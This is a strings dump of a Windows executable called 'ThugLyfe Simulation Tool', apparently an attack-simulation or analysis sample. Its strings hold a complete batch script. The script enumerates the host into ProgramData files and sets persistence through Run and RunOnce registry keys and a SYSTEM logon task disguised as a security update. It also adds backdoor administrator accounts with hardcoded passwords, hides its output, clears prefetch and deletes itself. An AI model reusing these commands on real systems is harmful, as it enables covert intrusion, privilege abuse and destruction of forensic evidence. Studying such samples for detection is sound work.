Number	Offset	Address		Size	Type	String
128	00008410	000000014000a010	Section(2)['.rdata']	28	A	========================================
129	0000843a	000000014000a03a	Section(2)['.rdata']	1a	A	  ThugLyfe Simulation Tool
130	00008458	000000014000a058	Section(2)['.rdata']	11	A	%Y-%m-%d %H:%M:%S
131	0000846a	000000014000a06a	Section(2)['.rdata']	1d	A	C:\ProgramData\SecurityUpdate
132	00008490	000000014000a090	Section(2)['.rdata']	28	A	C:\ProgramData\SecurityUpdate\update.log
133	000084b9	000000014000a0b9	Section(2)['.rdata']	15	A	SecurityAdvisory.docm
134	000084d2	000000014000a0d2	Section(2)['.rdata']	0d	A	cmd.exe /c %s
135	000084e0	000000014000a0e0	Section(2)['.rdata']	09	A	data1.bin
136	000084ea	000000014000a0ea	Section(2)['.rdata']	05	A	%s\%s
137	000084f0	000000014000a0f0	Section(2)['.rdata']	2f	A	C:\Users\IEUser\Documents\SecurityAdvisory.docm
138	00008520	000000014000a120	Section(2)['.rdata']	14	A	image_downloader.exe
139	00008538	000000014000a138	Section(2)['.rdata']	24	A	C:\Windows\Temp\image_downloader.exe
140	0000855d	000000014000a15d	Section(2)['.rdata']	0c	A	fileview.exe
141	0000856a	000000014000a16a	Section(2)['.rdata']	1c	A	C:\Windows\Temp\fileview.exe
142	00008587	000000014000a187	Section(2)['.rdata']	0d	A	frontpage.jpg
143	00008598	000000014000a198	Section(2)['.rdata']	26	A	C:\Users\Public\Pictures\frontpage.jpg
144	000085bf	000000014000a1bf	Section(2)['.rdata']	18	A	C:\ProgramData\asefa.bat
149	00008683	000000014000a283	Section(2)['.rdata']	1e	A	REM === SYSTEM ENUMERATION ===
151	000086cb	000000014000a2cb	Section(2)['.rdata']	2c	A	systeminfo > C:\ProgramData\sysinfo.txt 2>&1
153	00008727	000000014000a327	Section(2)['.rdata']	31	A	ipconfig /all > C:\ProgramData\netconfig.txt 2>&1
155	00008782	000000014000a382	Section(2)['.rdata']	2e	A	netstat -ano > C:\ProgramData\netstat.txt 2>&1
157	000087d8	000000014000a3d8	Section(2)['.rdata']	28	A	net user > C:\ProgramData\users.txt 2>&1
158	00008801	000000014000a401	Section(2)['.rdata']	3e	A	net localgroup administrators > C:\ProgramData\admins.txt 2>&1
160	00008868	000000014000a468	Section(2)['.rdata']	2f	A	tasklist /v > C:\ProgramData\processes.txt 2>&1
162	000088c1	000000014000a4c1	Section(2)['.rdata']	3b	A	schtasks /query /fo LIST /v > C:\ProgramData\tasks.txt 2>&1
164	00008925	000000014000a525	Section(2)['.rdata']	40	A	wmic product get name,version > C:\ProgramData\software.txt 2>&1
166	0000898d	000000014000a58d	Section(2)['.rdata']	42	A	wmic startup get caption,command > C:\ProgramData\startup.txt 2>&1
167	000089d1	000000014000a5d1	Section(2)['.rdata']	21	A	REM === PERSISTENCE MECHANISM ===
169	00008a19	000000014000a619	Section(2)['.rdata']	36	A	REM Copy image_downloader.exe to a persistent location
170	00008a50	000000014000a650	Section(2)['.rdata']	31	A	if exist "C:\Windows\Temp\image_downloader.exe" (
171	00008a82	000000014000a682	Section(2)['.rdata']	68	A	    copy /Y "C:\Windows\Temp\image_downloader.exe" "C:\ProgramData\SecurityUpdate\updater.exe" >nul 2>&1
172	00008aeb	000000014000a6eb	Section(2)['.rdata']	32	A	    echo [*] Payload copied to persistent location
173	00008b21	000000014000a721	Section(2)['.rdata']	2b	A	REM Create registry run key for persistence
175	00008b77	000000014000a777	Section(2)['.rdata']	97	A	reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdater" /t REG_SZ /d "C:\ProgramData\SecurityUpdate\updater.exe" /f >nul 2>&1
176	00008c10	000000014000a810	Section(2)['.rdata']	27	A	REM Alternative persistence via RunOnce
177	00008c38	000000014000a838	Section(2)['.rdata']	97	A	reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v "SystemCheck" /t REG_SZ /d "C:\ProgramData\SecurityUpdate\updater.exe" /f >nul 2>&1
178	00008cd1	000000014000a8d1	Section(2)['.rdata']	29	A	REM Create scheduled task for persistence
180	00008d1f	000000014000a91f	Section(2)['.rdata']	7d	A	schtasks /create /tn "SecurityUpdateTask" /tr "C:\ProgramData\SecurityUpdate\updater.exe" /sc onlogon /ru SYSTEM /f >nul 2>&1
183	00008df8	000000014000a9f8	Section(2)['.rdata']	15	A	REM Hide the evidence
184	00008e0e	000000014000aa0e	Section(2)['.rdata']	31	A	attrib +h +s C:\ProgramData\sysinfo.txt >nul 2>&1
185	00008e40	000000014000aa40	Section(2)['.rdata']	33	A	attrib +h +s C:\ProgramData\netconfig.txt >nul 2>&1
186	00008e74	000000014000aa74	Section(2)['.rdata']	31	A	attrib +h +s C:\ProgramData\netstat.txt >nul 2>&1
187	00008ea6	000000014000aaa6	Section(2)['.rdata']	2f	A	attrib +h +s C:\ProgramData\users.txt >nul 2>&1
188	00008ed6	000000014000aad6	Section(2)['.rdata']	30	A	attrib +h +s C:\ProgramData\admins.txt >nul 2>&1
189	00008f07	000000014000ab07	Section(2)['.rdata']	33	A	attrib +h +s C:\ProgramData\processes.txt >nul 2>&1
190	00008f3b	000000014000ab3b	Section(2)['.rdata']	2f	A	attrib +h +s C:\ProgramData\tasks.txt >nul 2>&1
191	00008f6b	000000014000ab6b	Section(2)['.rdata']	32	A	attrib +h +s C:\ProgramData\software.txt >nul 2>&1
192	00008f9e	000000014000ab9e	Section(2)['.rdata']	31	A	attrib +h +s C:\ProgramData\startup.txt >nul 2>&1
193	00008fd0	000000014000abd0	Section(2)['.rdata']	34	A	attrib +h +s C:\ProgramData\SecurityUpdate >nul 2>&1
194	00009006	000000014000ac06	Section(2)['.rdata']	22	A	echo [+] Creating user accounts...
196	00009065	000000014000ac65	Section(2)['.rdata']	31	A	net user Adminstrator P@ssw0rd123! /add >nul 2>&1
197	00009097	000000014000ac97	Section(2)['.rdata']	39	A	net localgroup Administrators Adminstrator /add >nul 2>&1
198	000090d2	000000014000acd2	Section(2)['.rdata']	1a	A	REM Create SUPPORT account
199	000090ed	000000014000aced	Section(2)['.rdata']	34	A	net user SUPPORT_2734272 Supp0rt#2024 /add >nul 2>&1
200	00009122	000000014000ad22	Section(2)['.rdata']	3c	A	net localgroup Administrators SUPPORT_2734272 /add >nul 2>&1
201	00009160	000000014000ad60	Section(2)['.rdata']	1e	A	echo [*] User accounts created
202	00009180	000000014000ad80	Section(2)['.rdata']	1a	A	REM === CLEAR PREFETCH ===
203	0000919b	000000014000ad9b	Section(2)['.rdata']	22	A	echo [+] Clearing prefetch data...
204	000091be	000000014000adbe	Section(2)['.rdata']	2c	A	del /F /Q C:\Windows\Prefetch\*.pf >nul 2>&1
206	00009206	000000014000ae06	Section(2)['.rdata']	36	A	REM === DELETE THIS BATCH FILE (MUST BE LAST STEP) ===
207	0000923d	000000014000ae3d	Section(2)['.rdata']	1f	A	echo [+] Removing batch file...
208	0000925d	000000014000ae5d	Section(2)['.rdata']	2c	A	del /F /Q C:\ProgramData\asefa.bat >nul 2>&1
209	0000928b	000000014000ae8b	Section(2)['.rdata']	09	A	exit /b 0
210	00009298	000000014000ae98	Section(2)['.rdata']	29	A	C:\ProgramData\SecurityUpdate\updater.exe
211	000092c2	000000014000aec2	Section(2)['.rdata']	1a	A	C:\ProgramData\sysinfo.txt
212	000092dd	000000014000aedd	Section(2)['.rdata']	1c	A	C:\ProgramData\netconfig.txt
213	000092fa	000000014000aefa	Section(2)['.rdata']	1a	A	C:\ProgramData\netstat.txt
214	00009315	000000014000af15	Section(2)['.rdata']	18	A	C:\ProgramData\users.txt
215	0000932e	000000014000af2e	Section(2)['.rdata']	19	A	C:\ProgramData\admins.txt
216	00009348	000000014000af48	Section(2)['.rdata']	1c	A	C:\ProgramData\processes.txt
217	00009365	000000014000af65	Section(2)['.rdata']	18	A	C:\ProgramData\tasks.txt
218	0000937e	000000014000af7e	Section(2)['.rdata']	1b	A	C:\ProgramData\software.txt
219	0000939a	000000014000af9a	Section(2)['.rdata']	1a	A	C:\ProgramData\startup.txt
220	000093b8	000000014000afb8	Section(2)['.rdata']	2d	A	Software\Microsoft\Windows\CurrentVersion\Run
221	000093e6	000000014000afe6	Section(2)['.rdata']	0f	A	SecurityUpdater
222	000093f8	000000014000aff8	Section(2)['.rdata']	31	A	Software\Microsoft\Windows\CurrentVersion\RunOnce
223	0000942a	000000014000b02a	Section(2)['.rdata']	0b	A	SystemCheck
235	000095ed	000000014000b1ed	Section(2)['.rdata']	09	A	data2.bin
236	000095f7	000000014000b1f7	Section(2)['.rdata']	09	A	data3.bin
237	00009601	000000014000b201	Section(2)['.rdata']	09	A	data4.bin
301	0000b702	0000000140010502	Section(6)['.idata']	0b	A	RegCloseKey
302	0000b710	0000000140010510	Section(6)['.idata']	0d	A	RegOpenKeyExA
303	0000b720	0000000140010520	Section(6)['.idata']	10	A	RegQueryValueExA
304	0000b734	0000000140010534	Section(6)['.idata']	0b	A	CloseHandle
305	0000b742	0000000140010542	Section(6)['.idata']	09	A	CopyFileA
306	0000b74e	000000014001054e	Section(6)['.idata']	10	A	CreateDirectoryA
307	0000b762	0000000140010562	Section(6)['.idata']	0e	A	CreateProcessA
308	0000b774	0000000140010574	Section(6)['.idata']	15	A	DeleteCriticalSection
309	0000b78c	000000014001058c	Section(6)['.idata']	14	A	EnterCriticalSection
310	0000b7a4	00000001400105a4	Section(6)['.idata']	12	A	GetFileAttributesA
311	0000b7ba	00000001400105ba	Section(6)['.idata']	0c	A	GetLastError
312	0000b7ca	00000001400105ca	Section(6)['.idata']	12	A	GetModuleFileNameA
313	0000b7e0	00000001400105e0	Section(6)['.idata']	0f	A	GetStartupInfoA
314	0000b7f2	00000001400105f2	Section(6)['.idata']	0c	A	GetStdHandle
315	0000b802	0000000140010602	Section(6)['.idata']	19	A	InitializeCriticalSection
316	0000b81e	000000014001061e	Section(6)['.idata']	10	A	IsDBCSLeadByteEx
317	0000b832	0000000140010632	Section(6)['.idata']	14	A	LeaveCriticalSection
318	0000b84a	000000014001064a	Section(6)['.idata']	13	A	MultiByteToWideChar
319	0000b860	0000000140010660	Section(6)['.idata']	17	A	SetConsoleTextAttribute
320	0000b87a	000000014001067a	Section(6)['.idata']	12	A	SetFileAttributesA
321	0000b890	0000000140010690	Section(6)['.idata']	1b	A	SetUnhandledExceptionFilter
322	0000b8ae	00000001400106ae	Section(6)['.idata']	05	A	Sleep
323	0000b8b6	00000001400106b6	Section(6)['.idata']	0b	A	TlsGetValue
324	0000b8c4	00000001400106c4	Section(6)['.idata']	0e	A	VirtualProtect
325	0000b8d6	00000001400106d6	Section(6)['.idata']	0c	A	VirtualQuery
326	0000b8e6	00000001400106e6	Section(6)['.idata']	13	A	WaitForSingleObject
327	0000b8fc	00000001400106fc	Section(6)['.idata']	13	A	WideCharToMultiByte
